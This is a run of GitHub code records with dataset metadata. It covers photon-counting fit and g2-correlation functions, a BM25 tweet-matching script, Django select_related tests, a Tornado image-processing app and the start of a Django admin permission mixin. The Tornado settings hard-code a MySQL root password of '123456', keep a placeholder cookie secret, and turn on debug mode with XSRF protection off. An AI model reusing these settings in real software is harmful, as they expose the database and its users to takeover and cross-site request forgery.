np.array([np.sum([A1fit[k]*np.exp(-(tlist[istart:iend]-tlist[istart])/tau1fit[k])+ybg*(k<1) for k in range(expterms)]) for i in range(len(xdata))])\r\n \r\n # plt.figure()\r\n # plt.semilogy(tlist,ylist,'.',xdata,yest,[xdata[1],xdata[-1]],[bgcpb,bgcpb],'k--')\r\n # # plt.xlim([xdata[1],xdata[-1]])\r\n # plt.show() \r\n # Amax is the maximum y-value\r\n Amax = np.max(ylist)\r\n \r\n return(tau1fit,A1fit,ybg,istart) \r\n\r\ndef MaxLikelihoodFit_c(tlist,ylist,istart,iend,bgcpb,plotbool=False,expterms=1):\r\n ### Maximum likelihood routine to fit single exponential. Pro: Works also for small amount of data (single bins of 10ms!)\r\n # tlist: x-axis values, here time in ns; ylist: y-axis values, here cts per tlist-bin; istart and iend: first and last element of tlist and ylist that are considered for the fit.\r\n\r\n # check if istart and iend are good numbers\r\n if istart<0 or istart>=len(ylist):\r\n istart = 0\r\n print('WARNING: adapted istart in MaxLikelihoodExpFit')\r\n if iend<=istart or iend>len(ylist):\r\n iend = len(ylist)\r\n print('WARNING: adapted iend in MaxLikelihoodExpFit')\r\n\r\n # shift t0 to t=0\r\n ydata = ylist[istart:iend]\r\n xdata = tlist[istart:iend]\r\n\r\n # do calculations\r\n initParams = [np.max(ydata)*np.ones(expterms), 25*np.ones(expterms)] #initial guess for A and tau\r\n if expterms>1:\r\n initParams[1][0]=initParams[1][1]/10 #Make first component fast\r\n if expterms>2:\r\n initParams[1][2]=initParams[1][1]/5 #Make third component slow\r\n initParams = np.concatenate(initParams).ravel().tolist()\r\n results = minimize(MaxLikelihoodFunction_c, initParams, args=(xdata,ydata,bgcpb,expterms),method='Nelder-Mead') # minimize the negative of the maxlikelihood function instead of maximimizing\r\n Aest = results.x[0:expterms] # get results of fit, A\r\n tauest = results.x[expterms:2*expterms] # get results of fit, tau\r\n\r\n# if plotbool == True:\r\n# yest = np.array([Aest*np.exp(-(xdata[i]-xdata[0])/tauest)+bgcpb for i in range(len(xdata))])\r\n# plt.semilogy(tlist,ylist,'.',xdata,yest,[xdata[1],xdata[-1]],[bgcpb,bgcpb],'k--')\r\n# plt.show() \r\n\r\n\r\n if plotbool == True:\r\n # yest = np.array([Aest[k]*np.exp(-(xdata[i]-xdata[0])/tauest[k])+bgcpb for i in range(len(xdata))])\r\n yest = np.array([np.sum([Aest[k]*np.exp(-(xdata[i]-xdata[0])/tauest[k])+bgcpb*(k<1) for k in range(expterms)]) for i in range(len(xdata))])\r\n plt.figure()\r\n plt.plot(tlist,ylist,'.',xdata,yest,[xdata[1],xdata[-1]],[bgcpb,bgcpb],'k--')\r\n plt.xlim([xdata[1],xdata[-1]])\r\n plt.show() \r\n \r\n return(tauest,Aest)\r\n\r\n\r\n\r\n\r\n\r\n#I changed some things in the g2 which make it works smoothly compared to the g2 that you implemented.\r\ndef MakeG2(times0,times1,dtmicro,g2restime=64e-11*20,nrbins=200):\r\n i0=0\r\n i1=0\r\n lim1=0\r\n g2 = np.zeros(2*nrbins)\r\n #g2B = np.zeros(2*nrbins)\r\n #g2C = np.zeros(2*nrbins)\r\n #blindB = 2e-9\r\n #blindC = 5e-9\r\n\r\n g2res = g2restime/dtmicro #transform g2restime [s] to g2res [microtime units]\r\n #blindB = blindB/tmicro\r\n #blindC = blindC/tmicro\r\n g2tlist = np.arange(-g2res*dtmicro*(nrbins-0.5),g2res*dtmicro*nrbins,g2restime)*1e9 #I thought this was the change that made it work for me\r\n # correlate det0 with det1 (positive time differences)\r\n for i0 in tqdm(range(len(times0))):\r\n t0 = times0[i0]\r\n i1 = 0\r\n q = 0\r\n while q == 0: \r\n if lim1 + i1 < len(times1): # check if we've already reached end of photon stream on det1\r\n dt = times1[lim1+i1]-t0 \r\n if dt < 0: # find index lim1 of first photon on det1 that came after photon i0 on det0\r\n lim1 = lim1 + 1\r\n else:\r\n binnr = int(dt/g2res) # calculate binnr that corresponds to dt\r\n if binnr < nrbins: # check if time difference is already large enough to stop correlation\r\n g2[nrbins + binnr] += 1 # increase counter in corresponding bin by one\r\n #if microtimes0[i0] > blindB and microtimes1[lim1+i1] > blindB:poi\r\n #g2B[nrbins + binnr] += 1\r\n #if microtimes0[i0] > blindC and microtimes1[lim1+i1] > blindC:\r\n #g2C[nrbins + binnr] += 1\r\n i1 = i1 + 1 # look at next photon on det1\r\n else:\r\n q = 1 # dt larger than maximum correlation width. stop. \r\n else:\r\n q = 1 # end of photon stream on det1 reached. stop.\r\n\r\n # correlate det1 with det0 (positive time differences)\r\n lim1=0\r\n for i0 in tqdm(range(len(times1))):\r\n t0 = times1[i0]\r\n i1 = 0\r\n q = 0\r\n while q == 0:\r\n if lim1 + i1 < len(times0):\r\n dt = times0[lim1+i1]-t0\r\n if dt < 0:\r\n lim1 = lim1 + 1\r\n else:\r\n binnr = int(dt/g2res)\r\n if binnr < nrbins:\r\n g2[nrbins - 1 - binnr] += 1\r\n #if microtimes0[lim1+i1] > blindB and microtimes1[i0] > blindB:\r\n # g2B[nrbins - 1 - binnr] += 1\r\n #if microtimes0[lim1+i1] > blindC and microtimes1[i0] > blindC:\r\n # g2C[nrbins - 1 - binnr] += 1\r\n i1 = i1 + 1\r\n else:\r\n q = 1\r\n else:\r\n q = 1\r\n \r\n # g2tlist = np.arange(g2res*dtmicro*nrbins,g2restime)*1e9\r\n plt.figure()\r\n plt.plot(g2tlist,g2)\r\n #plt.plot(g2tlist,g2B)\r\n #plt.plot(g2tlist,g2C)\r\n plt.title('g(2) correlation')\r\n plt.xlabel('delay (ns)')\r\n plt.ylabel('occurence (a.u.)')\r\n # plt.ylim([0,max(g2)])\r\n plt.show()\r\n\r\n return(g2tlist,g2,g2restime,nrbins)\r\n\r\ndef Easyhist(rawdata,lowestbin,highestbin,numberofpoints):\r\n plotpoints=numberofpoints+1\r\n edges=np.linspace(lowestbin,highestbin,plotpoints)\r\n wavelbins=np.linspace(lowestbin,highestbin,numberofpoints)\r\n histdata=np.histogram(rawdata,bins=edges)\r\n return wavelbins,histdata[0],edges","repo_name":"mmekkeringethcz/martijn_own_github","sub_path":"Read_PLE_functions_Martijn.py","file_name":"Read_PLE_functions_Martijn.py","file_ext":"py","file_size_in_byte":54091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35771467551","text":"# -*- coding: utf-8 -*-\r\nfrom gensim import corpora\r\nimport codecs\r\nimport math\r\nfrom text_to_bag_of_words import transform_line, words_have_stif_hashtag\r\nimport stif_nexterite_properties\r\nimport os\r\nfrom optparse import OptionParser\r\n\r\n\r\nlogger = stif_nexterite_properties.logger\r\n\r\nclass BM25 :\r\n def __init__(self, fn_docs, encoding='iso-8859-1' ) :\r\n self.encoding = encoding\r\n self.dictionary = corpora.Dictionary()\r\n self.DF = {}\r\n self.DocTF = []\r\n self.DocIDF = {}\r\n self.N = 0\r\n self.DocAvgLen = 0\r\n self.fn_docs = fn_docs\r\n self.DocLen = []\r\n self.buildDictionary()\r\n self.TFIDF_Generator()\r\n\r\n def buildDictionary(self) :\r\n raw_data = []\r\n with codecs.open(self.fn_docs,encoding=self.encoding) as f:\r\n for line in f :\r\n raw_data.append(transform_line(line))\r\n self.dictionary.add_documents(raw_data)\r\n\r\n def TFIDF_Generator(self, base=math.e) :\r\n docTotalLen = 0\r\n with codecs.open(self.fn_docs,encoding=self.encoding) as f:\r\n for line in f :\r\n doc = transform_line(line.strip())\r\n docTotalLen += len(doc)\r\n self.DocLen.append(len(doc))\r\n #print self.dictionary.doc2bow(doc)\r\n bow = dict([(term, freq*1.0/len(doc)) for term, freq in self.dictionary.doc2bow(doc)])\r\n for term, tf in bow.items() :\r\n if term not in self.DF :\r\n self.DF[term] = 0\r\n self.DF[term] += 1\r\n self.DocTF.append(bow)\r\n self.N = self.N + 1\r\n for term in self.DF:\r\n self.DocIDF[term] = math.log((self.N - self.DF[term] +0.5) / (self.DF[term] + 0.5), base)\r\n self.DocAvgLen = docTotalLen / self.N\r\n\r\n def BM25Score(self, Query=[], k1=1.5, b=0.75) :\r\n query_bow = self.dictionary.doc2bow(Query)\r\n scores = []\r\n for idx, doc in enumerate(self.DocTF) :\r\n commonTerms = set(dict(query_bow).keys()) & set(doc.keys())\r\n tmp_score = []\r\n doc_terms_len = self.DocLen[idx]\r\n for term in commonTerms :\r\n upper = (doc[term] * (k1+1))\r\n below = ((doc[term]) + k1*(1 - b + b*doc_terms_len/self.DocAvgLen))\r\n tmp_score.append(self.DocIDF[term] * upper / below)\r\n scores.append(sum(tmp_score))\r\n return scores\r\n\r\n def TFIDF(self) :\r\n tfidf = []\r\n for doc in self.DocTF :\r\n doc_tfidf = [(term, tf*self.DocIDF[term]) for term, tf in doc.items()]\r\n doc_tfidf.sort()\r\n tfidf.append(doc_tfidf)\r\n return tfidf\r\n\r\n def Text_line(self,i):\r\n return open(self.fn_docs, \"r\").readlines()[i]\r\n\r\n def Items(self) :\r\n # Return a list [(term_idx, term_desc),]\r\n items = self.dictionary.items()\r\n #items.sort()\r\n return items\r\n\r\ndef do_write_bm25_similarity_files(idate,filename1, filename2):\r\n data_dir = stif_nexterite_properties.data_dir\r\n bm25 = BM25(filename1)\r\n with codecs.open(filename2, 'r',encoding='utf-8', errors='ignore') as f:\r\n lines = f.readlines()\r\n iname = \"bm25_alerts_\"+idate\r\n ftt = codecs.open(os.path.join(data_dir,stif_nexterite_properties.label_name, iname+\".out\"), 'wb','utf-8')\r\n fnt = codecs.open(os.path.join(data_dir,stif_nexterite_properties.not_label_name, \"no_\"+iname+\".out\"), 'wb','utf-8')\r\n il=0\r\n inl=0\r\n for line in lines:\r\n words = transform_line(line)\r\n scores = bm25.BM25Score(words)\r\n best_score = max(scores)\r\n if best_score > stif_nexterite_properties.bm25_seuil:\r\n ftt.write(line)\r\n il += 1\r\n #ftt.write(\"****Best match %f\\t%s\"%(best_score,bm25.Text_line(i_line)))\r\n else:\r\n if not words_have_stif_hashtag(words):\r\n fnt.write(line)\r\n inl += 1\r\n #fnt.write(\"****Best match %f\\t%s\"%(best_score,bm25.Text_line(i_line)))\r\n ftt.close()\r\n fnt.close()\r\n logger.info(\"%s %d\"%(iname,il))\r\n logger.info(\"%s %d\"%(\"no_\"+iname,inl))\r\n\r\ndef write_bm25_similarity_files(idate,data_dir=stif_nexterite_properties.data_dir,data_impact_dir=stif_nexterite_properties.data_impact_dir,label_dir=stif_nexterite_properties.label_name,pre_dir=stif_nexterite_properties.pre_name):\r\n impact_filename = os.path.join(data_impact_dir, 'IMPACT_'+idate.replace('.','-')+'.csv')\r\n bm25 = BM25(impact_filename)\r\n infilename = os.path.join(data_dir, label_dir,pre_dir,'alerts_'+idate+'.out')\r\n do_write_bm25_similarity_files(idate,impact_filename,infilename)\r\n\r\n\r\nif __name__ == '__main__' :\r\n op = OptionParser()\r\n op.add_option(\"-d\", \"--date\",\r\n action=\"store\", dest=\"sel_date\", default=None,\r\n help=\"Date de sélection\")\r\n op.add_option(\"--src\",\r\n action=\"store\", dest=\"source\", default=None,\r\n help=\"Date de sélection\")\r\n op.add_option(\"--target\",\r\n action=\"store\", dest=\"target\", default=None,\r\n help=\"Date de sélection\")\r\n (opts, args) = op.parse_args()\r\n if opts.sel_date!=None:\r\n if opts.source == None:\r\n write_bm25_similarity_files(opts.sel_date)\r\n elif opts.target != None:\r\n do_write_bm25_similarity_files(opts.sel_date,os.path.join(stif_nexterite_properties.data_dir,opts.source),os.path.join(stif_nexterite_properties.data_dir,opts.target))\r\n\r\n\r\n","repo_name":"filrougestif2016/STIF_FILROUGE2016","sub_path":"PYTHON/CLASSIFICATION/bm25_impact_tweet.py","file_name":"bm25_impact_tweet.py","file_ext":"py","file_size_in_byte":5672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6307437655","text":"from django.core.exceptions import FieldError\nfrom django.db.models import FilteredRelation\nfrom django.test import SimpleTestCase, TestCase\n\nfrom .models import (\n AdvancedUserStat,\n Child1,\n Child2,\n Child3,\n Child4,\n Image,\n LinkedList,\n Parent1,\n Parent2,\n Product,\n StatDetails,\n User,\n UserProfile,\n UserStat,\n UserStatResult,\n)\n\n\nclass ReverseSelectRelatedTestCase(TestCase):\n @classmethod\n def setUpTestData(cls):\n user = User.objects.create(username=\"test\")\n UserProfile.objects.create(user=user, state=\"KS\", city=\"Lawrence\")\n results = UserStatResult.objects.create(results=\"first results\")\n userstat = UserStat.objects.create(user=user, posts=150, results=results)\n StatDetails.objects.create(base_stats=userstat, comments=259)\n\n user2 = User.objects.create(username=\"bob\")\n results2 = UserStatResult.objects.create(results=\"moar results\")\n advstat = AdvancedUserStat.objects.create(\n user=user2, posts=200, karma=5, results=results2\n )\n StatDetails.objects.create(base_stats=advstat, comments=250)\n p1 = Parent1(name1=\"Only Parent1\")\n p1.save()\n c1 = Child1(name1=\"Child1 Parent1\", name2=\"Child1 Parent2\", value=1)\n c1.save()\n p2 = Parent2(name2=\"Child2 Parent2\")\n p2.save()\n c2 = Child2(name1=\"Child2 Parent1\", parent2=p2, value=2)\n c2.save()\n\n def test_basic(self):\n with self.assertNumQueries(1):\n u = User.objects.select_related(\"userprofile\").get(username=\"test\")\n self.assertEqual(u.userprofile.state, \"KS\")\n\n def test_follow_next_level(self):\n with self.assertNumQueries(1):\n u = User.objects.select_related(\"userstat__results\").get(username=\"test\")\n self.assertEqual(u.userstat.posts, 150)\n self.assertEqual(u.userstat.results.results, \"first results\")\n\n def test_follow_two(self):\n with self.assertNumQueries(1):\n u = User.objects.select_related(\"userprofile\", \"userstat\").get(\n username=\"test\"\n )\n self.assertEqual(u.userprofile.state, \"KS\")\n self.assertEqual(u.userstat.posts, 150)\n\n def test_follow_two_next_level(self):\n with self.assertNumQueries(1):\n u = User.objects.select_related(\n \"userstat__results\", \"userstat__statdetails\"\n ).get(username=\"test\")\n self.assertEqual(u.userstat.results.results, \"first results\")\n self.assertEqual(u.userstat.statdetails.comments, 259)\n\n def test_forward_and_back(self):\n with self.assertNumQueries(1):\n stat = UserStat.objects.select_related(\"user__userprofile\").get(\n user__username=\"test\"\n )\n self.assertEqual(stat.user.userprofile.state, \"KS\")\n self.assertEqual(stat.user.userstat.posts, 150)\n\n def test_back_and_forward(self):\n with self.assertNumQueries(1):\n u = User.objects.select_related(\"userstat\").get(username=\"test\")\n self.assertEqual(u.userstat.user.username, \"test\")\n\n def test_not_followed_by_default(self):\n with self.assertNumQueries(2):\n u = User.objects.select_related().get(username=\"test\")\n self.assertEqual(u.userstat.posts, 150)\n\n def test_follow_from_child_class(self):\n with self.assertNumQueries(1):\n stat = AdvancedUserStat.objects.select_related(\"user\", \"statdetails\").get(\n posts=200\n )\n self.assertEqual(stat.statdetails.comments, 250)\n self.assertEqual(stat.user.username, \"bob\")\n\n def test_follow_inheritance(self):\n with self.assertNumQueries(1):\n stat = UserStat.objects.select_related(\"user\", \"advanceduserstat\").get(\n posts=200\n )\n self.assertEqual(stat.advanceduserstat.posts, 200)\n self.assertEqual(stat.user.username, \"bob\")\n with self.assertNumQueries(0):\n self.assertEqual(stat.advanceduserstat.user.username, \"bob\")\n\n def test_nullable_relation(self):\n im = Image.objects.create(name=\"imag1\")\n p1 = Product.objects.create(name=\"Django Plushie\", image=im)\n p2 = Product.objects.create(name=\"Talking Django Plushie\")\n\n with self.assertNumQueries(1):\n result = sorted(\n Product.objects.select_related(\"image\"), key=lambda x: x.name\n )\n self.assertEqual(\n [p.name for p in result], [\"Django Plushie\", \"Talking Django Plushie\"]\n )\n\n self.assertEqual(p1.image, im)\n # Check for ticket #13839\n self.assertIsNone(p2.image)\n\n def test_missing_reverse(self):\n \"\"\"\n Ticket #13839: select_related() should NOT cache None\n for missing objects on a reverse 1-1 relation.\n \"\"\"\n with self.assertNumQueries(1):\n user = User.objects.select_related(\"userprofile\").get(username=\"bob\")\n with self.assertRaises(UserProfile.DoesNotExist):\n user.userprofile\n\n def test_nullable_missing_reverse(self):\n \"\"\"\n Ticket #13839: select_related() should NOT cache None\n for missing objects on a reverse 0-1 relation.\n \"\"\"\n Image.objects.create(name=\"imag1\")\n\n with self.assertNumQueries(1):\n image = Image.objects.select_related(\"product\").get()\n with self.assertRaises(Product.DoesNotExist):\n image.product\n\n def test_parent_only(self):\n with self.assertNumQueries(1):\n p = Parent1.objects.select_related(\"child1\").get(name1=\"Only Parent1\")\n with self.assertNumQueries(0):\n with self.assertRaises(Child1.DoesNotExist):\n p.child1\n\n def test_multiple_subclass(self):\n with self.assertNumQueries(1):\n p = Parent1.objects.select_related(\"child1\").get(name1=\"Child1 Parent1\")\n self.assertEqual(p.child1.name2, \"Child1 Parent2\")\n\n def test_onetoone_with_subclass(self):\n with self.assertNumQueries(1):\n p = Parent2.objects.select_related(\"child2\").get(name2=\"Child2 Parent2\")\n self.assertEqual(p.child2.name1, \"Child2 Parent1\")\n\n def test_onetoone_with_two_subclasses(self):\n with self.assertNumQueries(1):\n p = Parent2.objects.select_related(\"child2\", \"child2__child3\").get(\n name2=\"Child2 Parent2\"\n )\n self.assertEqual(p.child2.name1, \"Child2 Parent1\")\n with self.assertRaises(Child3.DoesNotExist):\n p.child2.child3\n p3 = Parent2(name2=\"Child3 Parent2\")\n p3.save()\n c2 = Child3(name1=\"Child3 Parent1\", parent2=p3, value=2, value3=3)\n c2.save()\n with self.assertNumQueries(1):\n p = Parent2.objects.select_related(\"child2\", \"child2__child3\").get(\n name2=\"Child3 Parent2\"\n )\n self.assertEqual(p.child2.name1, \"Child3 Parent1\")\n self.assertEqual(p.child2.child3.value3, 3)\n self.assertEqual(p.child2.child3.value, p.child2.value)\n self.assertEqual(p.child2.name1, p.child2.child3.name1)\n\n def test_multiinheritance_two_subclasses(self):\n with self.assertNumQueries(1):\n p = Parent1.objects.select_related(\"child1\", \"child1__child4\").get(\n name1=\"Child1 Parent1\"\n )\n self.assertEqual(p.child1.name2, \"Child1 Parent2\")\n self.assertEqual(p.child1.name1, p.name1)\n with self.assertRaises(Child4.DoesNotExist):\n p.child1.child4\n Child4(name1=\"n1\", name2=\"n2\", value=1, value4=4).save()\n with self.assertNumQueries(1):\n p = Parent2.objects.select_related(\"child1\", \"child1__child4\").get(\n name2=\"n2\"\n )\n self.assertEqual(p.name2, \"n2\")\n self.assertEqual(p.child1.name1, \"n1\")\n self.assertEqual(p.child1.name2, p.name2)\n self.assertEqual(p.child1.value, 1)\n self.assertEqual(p.child1.child4.name1, p.child1.name1)\n self.assertEqual(p.child1.child4.name2, p.child1.name2)\n self.assertEqual(p.child1.child4.value, p.child1.value)\n self.assertEqual(p.child1.child4.value4, 4)\n\n def test_inheritance_deferred(self):\n c = Child4.objects.create(name1=\"n1\", name2=\"n2\", value=1, value4=4)\n with self.assertNumQueries(1):\n p = (\n Parent2.objects.select_related(\"child1\")\n .only(\"id2\", \"child1__value\")\n .get(name2=\"n2\")\n )\n self.assertEqual(p.id2, c.id2)\n self.assertEqual(p.child1.value, 1)\n p = (\n Parent2.objects.select_related(\"child1\")\n .only(\"id2\", \"child1__value\")\n .get(name2=\"n2\")\n )\n with self.assertNumQueries(1):\n self.assertEqual(p.name2, \"n2\")\n p = (\n Parent2.objects.select_related(\"child1\")\n .only(\"id2\", \"child1__value\")\n .get(name2=\"n2\")\n )\n with self.assertNumQueries(1):\n self.assertEqual(p.child1.name2, \"n2\")\n\n def test_inheritance_deferred2(self):\n c = Child4.objects.create(name1=\"n1\", name2=\"n2\", value=1, value4=4)\n qs = Parent2.objects.select_related(\"child1\", \"child1__child4\").only(\n \"id2\", \"child1__value\", \"child1__child4__value4\"\n )\n with self.assertNumQueries(1):\n p = qs.get(name2=\"n2\")\n self.assertEqual(p.id2, c.id2)\n self.assertEqual(p.child1.value, 1)\n self.assertEqual(p.child1.child4.value4, 4)\n self.assertEqual(p.child1.child4.id2, c.id2)\n p = qs.get(name2=\"n2\")\n with self.assertNumQueries(1):\n self.assertEqual(p.child1.name2, \"n2\")\n p = qs.get(name2=\"n2\")\n with self.assertNumQueries(0):\n self.assertEqual(p.child1.value, 1)\n self.assertEqual(p.child1.child4.value4, 4)\n with self.assertNumQueries(2):\n self.assertEqual(p.child1.name1, \"n1\")\n self.assertEqual(p.child1.child4.name1, \"n1\")\n\n def test_self_relation(self):\n item1 = LinkedList.objects.create(name=\"item1\")\n LinkedList.objects.create(name=\"item2\", previous_item=item1)\n with self.assertNumQueries(1):\n item1_db = LinkedList.objects.select_related(\"next_item\").get(name=\"item1\")\n self.assertEqual(item1_db.next_item.name, \"item2\")\n\n\nclass ReverseSelectRelatedValidationTests(SimpleTestCase):\n \"\"\"\n Rverse related fields should be listed in the validation message when an\n invalid field is given in select_related().\n \"\"\"\n\n non_relational_error = (\n \"Non-relational field given in select_related: '%s'. Choices are: %s\"\n )\n invalid_error = (\n \"Invalid field name(s) given in select_related: '%s'. Choices are: %s\"\n )\n\n def test_reverse_related_validation(self):\n fields = \"userprofile, userstat\"\n\n with self.assertRaisesMessage(\n FieldError, self.invalid_error % (\"foobar\", fields)\n ):\n list(User.objects.select_related(\"foobar\"))\n\n with self.assertRaisesMessage(\n FieldError, self.non_relational_error % (\"username\", fields)\n ):\n list(User.objects.select_related(\"username\"))\n\n def test_reverse_related_validation_with_filtered_relation(self):\n fields = \"userprofile, userstat, relation\"\n with self.assertRaisesMessage(\n FieldError, self.invalid_error % (\"foobar\", fields)\n ):\n list(\n User.objects.annotate(\n relation=FilteredRelation(\"userprofile\")\n ).select_related(\"foobar\")\n )\n","repo_name":"django/django","sub_path":"tests/select_related_onetoone/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":11873,"program_lang":"python","lang":"en","doc_type":"code","stars":74132,"dataset":"github-code","pt":"37"} +{"seq_id":"40676800853","text":"import sys\nimport os.path\nimport re\nimport torndb\nimport tornado.httpserver\nimport tornado.ioloop\nimport tornado.options\nimport tornado.web\nfrom tornado.options import define, options\nfrom handler.login import *\nfrom handler.main import *\nfrom handler.image import *\nfrom handler.color import *\nfrom handler.Morphological import *\nfrom handler.canny import *\nfrom handler.pyramid import *\nfrom handler.hash import *\nfrom handler.noisy import *\nfrom handler.equ import *\nfrom handler.hist import *\nfrom handler.hough import *\ndefine(\"port\", default=8888, help=\"run on the given port\", type=int)\ndefine(\"mysql_host\", default=\"127.0.0.1:3306\", help=\"blog database host\")\ndefine(\"mysql_database\", default=\"franzblog\", help=\"blog database name\")\ndefine(\"mysql_user\", default=\"root\", help=\"blog database user\")\ndefine(\"mysql_password\", default=\"123456\", help=\"blog database password\")\n\n\n\nclass Application(tornado.web.Application):\n def __init__(self):\n handlers = [\n #首页\n (r\"/\", MainHandler),\n #控制及测试面版\n (r\"/dashboard\", DashBoardHandler),\n #登陆\n (r\"/error\",ErrorHandler),\n (r\"/login\",LoginHandler),\n (r\"/loginout\",LogoutHandler),\n (r\"/needlogin\",NeedLoginHandler),\n (r\"/register\",RegisterHandler),\n (r\"/success\",SuccessHandler),\n #image\n #彩色图像变黑白图像\n (r\"/addimage\",AddImageHandler),\n (r\"/imagenow\",NowImageHandler),\n (r\"/imagetmp\",TmpImageHandler),\n (r\"/imageupload\",UploadImageHandler),\n (r\"/imageprocess\",ProcessImageHandler),\n (r\"/imagereset\", ResetImageHandler),\n (r\"/imagedownload\",DownloadTmpImageHandler),\n (r\"/ColorBlackWhite\", ColorBlackWhiteHandler),\n #图像处理\n (r\"/customcolor\", CustomColorHandler),\n (r\"/getorangered\",GetOrangeRedHandler),\n (r\"/getorange\",GetOrangeHandler),\n (r\"/getyellow\",GetYellowHandler),\n (r\"/getyellowgreen\",GetYelloGreenwHandler),\n (r\"/getweakgreen\",GetWeakGreenwHandler),\n (r\"/getweakgreentwo\",GetWeakGreenTwoHandler),\n (r\"/getweakgreenthree\",GetWeakGreenThreeHandler),\n (r\"/getgreen\",GetGreenHandler),\n (r\"/getbluegreen\",GetBlueGreenHandler),\n (r\"/getweakblue\",GetWeakBlueHandler),\n (r\"/getblue\",GetBlueHandler),\n (r\"/getdeepblue\",GetDeepBlueHandler),\n (r\"/getdeepbluetwo\",GetDeepBlueTwoHandler),\n (r\"/getpurple\", GetPurpleHandler),\n (r\"/getpurpletwo\", GetPurpleTwoHandler),\n (r\"/getpurplethree\", GetPurpleThreeHandler),\n (r\"/getpink\", GetPinkHandler),\n (r\"/getred\", GetRedHandler),\n #形态学变换\n (r\"/rust\", RustImageHandler),\n (r\"/dilation\", DilationImageHandler),\n (r\"/opening\", OpeningHandler),\n (r\"/closing\", ClosingHandler),\n (r\"/gradient\", GradientHandler),\n (r\"/tophat\", TopHatHandler),\n (r\"/blackhat\", BlackHatHandler),\n #边缘检测\n (r\"/laplacian\", LaplacianHandler),\n (r\"/sobelx\", SobelxHandler),\n (r\"/sobely\", SobelyHandler), \n (r\"/canny\", CannyHandler),\n #金字塔\n (r\"/pyrdown\", PyrDownHandler),\n (r\"/pyrup\", PyrUpHandler),\n #哈希\n (r\"/phash\", PhashHandler),\n #去噪\n (r\"/RepairNoColored\", RepairNoColoredHandler),\n (r\"/RepairColored\", RepairColoredHandler),\n #图像均值化增加对比度\n (r\"/Equ\", EquHandler),\n #颜色直方图\n (r\"/bhist\", BlueHistHandler),\n (r\"/ghist\", GreenHistHandler),\n (r\"/rhist\", RedHistHandler),\n (r\"/bgrhist\", BGRHistHandler),\n #Houghline\n (r\"/hlines\", HoughlinesHandler),\n (r\"/hlinesP\",HoughlinesPHandler),\n (r\"/hcircles\",HoughCirclesHandler),\n \n \n \n\n \n \n \n \n\n ]\n\n settings = dict(\n blog_title=u\"Tornado Blog\",\n template_path=os.path.join(os.path.dirname(__file__), \"templates\"),\n static_path=os.path.join(os.path.dirname(__file__), \"static\"),\n xsrf_cookies=False,\n cookie_secret=\"__TODO:_GENERATE_YOUR_OWN_RANDOM_VALUE_HERE__\",\n debug=True,\n )\n\n tornado.web.Application.__init__(self, handlers, **settings)\n self.db = torndb.Connection(\n host=options.mysql_host, database=options.mysql_database,\n user=options.mysql_user, password=options.mysql_password,charset='utf8')\n\n\ndef main():\n tornado.options.parse_command_line()\n http_server = tornado.httpserver.HTTPServer(Application())\n http_server.listen(options.port)\n tornado.ioloop.IOLoop.instance().start()\n\nif __name__ == \"__main__\":\n main()","repo_name":"rinetd/ImageOnline","sub_path":"A/ImageOneline.py","file_name":"ImageOneline.py","file_ext":"py","file_size_in_byte":5058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"27993806091","text":"import json\nfrom collections import OrderedDict\nfrom functools import wraps\n\nfrom django.conf import settings\nfrom django.contrib.admin.models import LogEntry, CHANGE\nfrom django.contrib.admin.options import get_content_type_for_model\nfrom django.contrib.auth import get_permission_codename\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.postgres.fields import JSONField\nfrom django.db import models\nfrom django.db.models.base import ModelBase\nfrom django.db.models.fields import NOT_PROVIDED\nfrom django.forms import model_to_dict\nfrom django.utils.encoding import force_str\nfrom django.utils.functional import cached_property\nfrom django.utils.html import escape\nfrom django.utils.safestring import SafeString, mark_safe\nfrom rest_framework import filters\nfrom rest_framework import serializers\nfrom rest_framework import viewsets, status\nfrom rest_framework.decorators import action as base_action\nfrom rest_framework.fields import ImageField\nfrom rest_framework.fields import SkipField\nfrom rest_framework.metadata import SimpleMetadata\nfrom rest_framework.permissions import AllowAny, BasePermission\nfrom rest_framework.relations import PrimaryKeyRelatedField, PKOnlyObject, ManyRelatedField\nfrom rest_framework.response import Response\nfrom rest_framework.routers import DefaultRouter\nfrom rest_framework.serializers import ModelSerializer\nfrom rest_framework.serializers import SerializerMethodField\n\nfrom admin_rest.fields import CurrencySerialRestField\nfrom admin_rest.fields import ForeignSerialField\nfrom admin_rest.filters import GenericAllFieldsFilter\nfrom admin_rest.utils import get_user_permissions\nfrom core.currency import CurrencyModelField\nfrom core.models.inouts.pair import PairModelField, PairSerialRestField\nfrom lib.fields import JSDatetimeField, RichTextField, RichTextSerialField, ImageSerialField, TextSerialField, \\\n JsonSerialField, SVGAndImageField\n\nUser = get_user_model()\n\n\nclass AlreadyRegistered(Exception):\n pass\n\n\nclass NotRegistered(Exception):\n pass\n\n\nclass ImproperlyConfigured(Exception):\n pass\n\n\nclass AuthPermissionViewSetMixin:\n NOT_FOUND_PERMISSION_DEFAULT = False\n permission_map = dict()\n\n def get_permission_map(self):\n permission_map = {\n 'list': self._make_permission_key('view'),\n 'retrieve': self._make_permission_key('view'),\n 'create': self._make_permission_key('add'),\n 'update': self._make_permission_key('change'),\n 'partial_update': self._make_permission_key('change'),\n 'destroy': self._make_permission_key('delete'),\n }\n permission_map.update(self.permission_map)\n return permission_map\n\n @cached_property\n def _options(self):\n return self.queryset.model._meta\n\n def _make_permission_key(self, action):\n code_name = get_permission_codename(action, self._options)\n return \"{0}.{1}\".format(self._options.app_label, code_name)\n\n def has_perm_action(self, action, request, obj=None):\n if not action:\n return False\n\n if action == 'metadata':\n return True\n\n perm_map = self.get_permission_map()\n if hasattr(getattr(self, action), 'permissions'):\n perm_map.update(**{action: getattr(self, action).permissions})\n\n if action not in perm_map:\n return self.NOT_FOUND_PERMISSION_DEFAULT\n\n perm_code = perm_map[action]\n if callable(perm_code):\n return perm_code(self, action, request, obj)\n if isinstance(perm_code, bool):\n return perm_code\n\n if perm_code in ['view', 'add', 'change', 'delete']:\n perm_code = self._make_permission_key(perm_code)\n\n # checks list of permissions\n if isinstance(perm_code, list) or isinstance(perm_code, tuple):\n for code in perm_code:\n if code in ['view', 'add', 'change', 'delete']:\n code = self._make_permission_key(code)\n has_perm = request.user.has_perm(code)\n if has_perm:\n return has_perm\n return False\n\n return 